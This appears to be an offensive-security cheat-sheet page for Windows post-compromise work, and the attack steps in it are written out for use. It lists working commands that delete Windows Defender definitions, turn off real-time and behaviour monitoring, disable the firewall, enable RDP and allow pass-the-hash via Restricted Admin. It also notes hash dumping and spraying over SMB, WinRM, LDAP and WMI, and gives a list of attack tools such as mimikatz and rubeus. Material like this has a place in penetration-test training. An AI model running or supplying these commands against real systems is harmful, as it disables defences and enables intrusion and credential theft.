4. Post Compromise

Blast AV and enable RDP with hashes

cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinitions -all
REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f
REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f
NetSh Advfirewall set allprofiles state off 
cmd.exe /c netsh firewall set opmode disable && reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\\System\\CurrentControlSet\\Control\\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

Sharphound → Bloodhound
Dump all hashes and spray
1. SMB
2. winrm
3. ldap
4. wmi

Quick Checklist

1. Enumeration

2. Initial Access

Phishing

3. Privilege Escalation - Windows

4. Post Compromise

5. Persistence

6. Pivot

Linux AD

Blast Defender

autorecon

nmap

wpscan

fuff

nikto

gobuster

netexec

powerview

msf

rubeus

powersploit

mimikatz

ligolo-ng

4. Post Compromise